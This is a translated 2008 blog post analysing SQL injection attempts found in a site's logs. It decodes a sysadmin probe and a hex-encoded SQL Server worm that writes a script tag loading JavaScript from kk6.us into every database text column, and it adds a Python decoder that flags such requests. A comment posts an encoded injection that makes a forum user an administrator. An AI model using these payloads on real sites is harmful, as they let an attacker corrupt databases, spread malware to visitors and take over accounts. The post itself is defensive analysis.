Decoding SQL Injection Code Found on the Website

Posted: 2008/6/1 0:23:12      Views: 8406
      Last time in my QQ Zone I mentioned that SQL injection using HEX encoding can get past an ordinary IDS. Sure enough, over the past few days the site logged exactly this kind of illegal scanning. Fortunately my site was prepared in advance, so let's take a look at what these jerks were up to. Here are a few of the records:

Submitted parameter: 1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

Decoding this: 0x730079007300610064006D0069006E00
Content: sysadmin

This one is clear enough: it first checks whether the database connection has sysadmin rights. Then comes this one:

Submitted parameter: 1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--


Decoding the hex content gives: dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

That still looks a bit messy (the mixed case is there to dodge keyword matching), so here it is converted to lowercase: declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

OK, after decoding it is basically readable. A brief explanation: as long as the system has a SQL injection flaw, the code above gets executed; it uses a cursor to walk every table and column in the database and appends this code to each column's contents: </title><script src=http://%6b%6b%36%2e%75%73/1.js></script>

The part (%6b%6b%36%2e%75%73) is URL-encoded as well; decoding it gives: kk6.us
So the code inserted into the database columns is actually: </title><script src=http://kk6.us/1.js></script>

So, as soon as one of your pages reads a column containing this code from the database, things go wrong: the page loads the 1.js file from kk6.us, and the moment you visit it, heh heh, you're done for...
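Here is a small Python script, added as an example and not part of the original post, that automates the decoding done by hand above: it peels URL encoding and 0x hex literals off a few constructed log lines (the log format and the keyword list are my own assumptions), treating UTF-16LE bytes as nvarchar and anything else as varchar, and flags the SQL keywords that appear in these payloads.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (assumed format, not records from the post's server):
# lines 1 and 2 carry the two hex payloads the post decodes (the second cut to its
# first 39 bytes to keep the sample short); line 3 is an ordinary request.
SAMPLE_LOG = """\
GET /news.asp?id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)%3D1
GET /news.asp?id=1';dEcLaRe%20@s%20vArChAr(4000);sEt%20@s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529%20aS%20vArChAr(4000));exec(@s);--
GET /news.asp?id=42
"""

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
# Markers from the decoded payloads above, matched case-insensitively because
# the worm randomises letter case to slip past naive signatures.
SQL_MARKERS = ("declare", "cast(", "exec(", "sysobjects", "syscolumns",
               "is_srvrolemember", "cursor", "update ", "<script")

def expand_hex_literal(m):
    """Decode one 0x literal as SQL Server's CAST would: bytes that look like UTF-16LE
    (every second byte NUL, as in the sysadmin check) are nvarchar, else varchar."""
    if len(m.group(1)) % 2:      # odd digit count: not a byte string, leave as-is
        return m.group(0)
    raw = bytes.fromhex(m.group(1))
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")

def decode_layers(text, max_rounds=4):
    """Peel URL encoding and 0x literals until nothing changes (bounded rounds)."""
    for _ in range(max_rounds):
        nxt = HEX_LITERAL.sub(expand_hex_literal, unquote(text))
        if nxt == text:
            break
        text = nxt
    return text

def analyze_request(line):
    """Return the fully decoded request and the injection markers found in it."""
    decoded = decode_layers(line)
    hits = [k for k in SQL_MARKERS if k in decoded.lower()]
    return {"decoded": decoded, "hits": hits, "suspicious": bool(hits)}

def scan_log(log_text):
    """Analyze every non-empty line of a log dump."""
    return [analyze_request(l) for l in log_text.splitlines() if l.strip()]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print("SUSPICIOUS" if r["suspicious"] else "ok", r["hits"], r["decoded"][:70])
```

Running it over real access logs is a quick way to spot this worm even when the keywords never appear in plain text in the request.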

That is a brief introduction to the injection method that has been going around lately; if anything I said is wrong, I ask the experts to please correct me.
Comments
  • Re: Decoding SQL Injection Code Found on the Website  (2008/6/13 11:06:55) by dib 
    up
  • Re: Decoding SQL Injection Code Found on the Website  (2008/6/29 9:51:53) by 唯情 
    Could you provide a fix?
  • Re: Decoding SQL Injection Code Found on the Website  (2008/6/30 16:46:11) by tthought 
    Can this be blocked by configuring something in SQL and writing some code there?
  • Re: Decoding SQL Injection Code Found on the Website  (2008/7/14 11:14:44) by 中华寻 
    Useful
  • Re: Decoding SQL Injection Code Found on the Website  (2009/3/10 12:33:18) by ylp1588 
    Using stored procedures solves most injection, and you can also control parameter length, type and so on.
  • Re: Decoding SQL Injection Code Found on the Website  (2009/4/7 18:02:17) by lclc88 
    Let me give it a try
  • Re: Decoding SQL Injection Code Found on the Website  (2009/7/30 18:34:07) by honshon 
    Impressive, off to test my own site right away
  • Re: Decoding SQL Injection Code Found on the Website  (2009/9/26 11:38:20) by suncathay 
    Many thanks for the selfless contribution, bookmarked. !!!!
  • Re: Decoding SQL Injection Code Found on the Website  (2010/3/25 23:22:24) by 真实姓 
    Could you provide a fix?
  • Re: Decoding SQL Injection Code Found on the Website  (2010/7/30 16:48:28) by yujie 
    Why does only SQL Server have this problem?
  • Re: Decoding SQL Injection Code Found on the Website  (2012/3/26 1:16:09) by Black World 
    Here are a few more for you.

    %31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

    SQL_en:

    0x31002C00310029003B0075007000640061007400650020005B00640076005F0075007300650072005D00200073006500740020007500730065007200670072006F0075007000690064003D00310020007700680065007200650020007500730065007200690064003D0032003B002D002D002000

    hex:

    0x312C31293B757064617465205B64765F757365725D20736574207573657267726F757069643D31207768657265207573657269643D323B2D2D20

    ASC:

    49 44 49 41 59 117 112 100 97 116 101 32 91 100 118 95 117 115 101 114 93 32 115 101 116 32 117 115 101 114 103 114 111 117 112 105 100 61 49 32 119 104 101 114 101 32 117 115 101 114 105 100 61 50 59 45 45 32

    Decoded, this is:

    1,1);update [dv_user] set usergroupid=1 where userid=2;--

    By: Black World